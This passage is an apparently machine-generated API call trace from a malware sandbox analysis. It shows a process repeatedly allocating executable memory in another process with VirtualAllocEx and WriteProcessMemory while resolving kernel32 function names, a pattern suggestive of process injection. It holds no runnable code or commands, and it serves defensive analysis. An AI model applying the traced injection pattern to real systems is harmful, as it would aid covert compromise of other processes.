(lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.351] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.351] lstrlenA (lpString="CreateThread") returned 12 [0176.351] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.351] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9c94*, nSize=0xd, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9c94*, lpNumberOfBytesWritten=0xcd978*=0xd) returned 1 [0176.353] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.353] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c660 [0176.353] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.353] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c660*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c660*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.353] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.354] ResetEvent (hEvent=0x580) returned 1 [0176.354] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.354] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.354] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.355] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c660 | out: hHeap=0x2150000) returned 1 [0176.355] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.355] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.355] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.355] lstrlenA (lpString="DeleteCriticalSection") returned 21 [0176.355] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.355] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9ca4*, nSize=0x16, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9ca4*, lpNumberOfBytesWritten=0xcd978*=0x16) returned 1 [0176.356] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.356] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cea0 [0176.356] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.357] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cea0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cea0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.357] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.358] ResetEvent (hEvent=0x580) returned 1 [0176.358] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.358] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.358] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.358] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cea0 | out: hHeap=0x2150000) returned 1 [0176.358] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.359] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.359] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.359] lstrlenA (lpString="lstrlenW") returned 8 [0176.359] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.359] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9cbc*, nSize=0x9, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9cbc*, lpNumberOfBytesWritten=0xcd978*=0x9) returned 1 [0176.362] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.362] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cab0 [0176.362] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.362] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cab0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cab0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.363] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.363] ResetEvent (hEvent=0x580) returned 1 [0176.363] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.364] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.364] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.364] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cab0 | out: hHeap=0x2150000) returned 1 [0176.364] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.364] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.364] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.365] lstrlenA (lpString="LocalFree") returned 9 [0176.365] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.365] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9cc8*, nSize=0xa, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9cc8*, lpNumberOfBytesWritten=0xcd978*=0xa) returned 1 [0176.366] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.366] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cab0 [0176.366] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.367] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cab0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cab0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.367] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.368] ResetEvent (hEvent=0x580) returned 1 [0176.368] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.368] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.368] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.368] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cab0 | out: hHeap=0x2150000) returned 1 [0176.368] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.369] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.369] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.369] lstrlenA (lpString="lstrcpynA") returned 9 [0176.369] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.369] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9cd4*, nSize=0xa, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9cd4*, lpNumberOfBytesWritten=0xcd978*=0xa) returned 1 [0176.371] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.371] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cc90 [0176.371] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.371] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cc90*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cc90*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.372] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.372] ResetEvent (hEvent=0x580) returned 1 [0176.372] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.372] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.373] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.373] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cc90 | out: hHeap=0x2150000) returned 1 [0176.373] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.373] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.373] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.373] lstrlenA (lpString="lstrcmpA") returned 8 [0176.373] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.374] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9ce0*, nSize=0x9, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9ce0*, lpNumberOfBytesWritten=0xcd978*=0x9) returned 1 [0176.375] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.376] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c870 [0176.376] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.376] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c870*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c870*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.376] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.377] ResetEvent (hEvent=0x580) returned 1 [0176.377] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.377] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.377] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.377] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c870 | out: hHeap=0x2150000) returned 1 [0176.377] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.378] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.378] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.378] lstrlenA (lpString="AreFileApisANSI") returned 15 [0176.378] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.378] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9cec*, nSize=0x10, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9cec*, lpNumberOfBytesWritten=0xcd978*=0x10) returned 1 [0176.380] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.380] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c660 [0176.380] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.380] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c660*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c660*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.381] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.381] ResetEvent (hEvent=0x580) returned 1 [0176.381] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.381] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.381] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.382] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c660 | out: hHeap=0x2150000) returned 1 [0176.382] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.382] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.382] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.382] lstrlenA (lpString="ReadFile") returned 8 [0176.382] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.382] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9cfe*, nSize=0x9, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9cfe*, lpNumberOfBytesWritten=0xcd978*=0x9) returned 1 [0176.384] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.384] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c3f0 [0176.384] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.384] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c3f0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c3f0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.385] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.385] ResetEvent (hEvent=0x580) returned 1 [0176.385] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.386] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.386] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.386] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c3f0 | out: hHeap=0x2150000) returned 1 [0176.386] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.386] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.387] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.387] lstrlenA (lpString="TryEnterCriticalSection") returned 23 [0176.387] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.387] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9d0a*, nSize=0x18, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9d0a*, lpNumberOfBytesWritten=0xcd978*=0x18) returned 1 [0176.390] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.390] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c510 [0176.390] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.390] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c510*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c510*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.391] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.391] ResetEvent (hEvent=0x580) returned 1 [0176.391] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.391] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.392] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.392] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c510 | out: hHeap=0x2150000) returned 1 [0176.392] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.392] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.392] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.392] lstrlenA (lpString="HeapCreate") returned 10 [0176.392] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.393] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9d24*, nSize=0xb, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9d24*, lpNumberOfBytesWritten=0xcd978*=0xb) returned 1 [0176.394] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.394] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c9c0 [0176.394] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.394] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c9c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c9c0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.395] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.395] ResetEvent (hEvent=0x580) returned 1 [0176.395] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.396] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.396] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.396] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c9c0 | out: hHeap=0x2150000) returned 1 [0176.396] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.396] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.396] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.396] lstrlenA (lpString="GetFullPathNameW") returned 16 [0176.396] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.397] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9d32*, nSize=0x11, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9d32*, lpNumberOfBytesWritten=0xcd978*=0x11) returned 1 [0176.398] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.398] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c930 [0176.398] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.398] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c930*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c930*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.399] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.399] ResetEvent (hEvent=0x580) returned 1 [0176.400] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.400] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.400] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.400] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c930 | out: hHeap=0x2150000) returned 1 [0176.400] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.400] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.401] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.401] lstrlenA (lpString="WriteFile") returned 9 [0176.401] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.401] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9d46*, nSize=0xa, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9d46*, lpNumberOfBytesWritten=0xcd978*=0xa) returned 1 [0176.402] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, 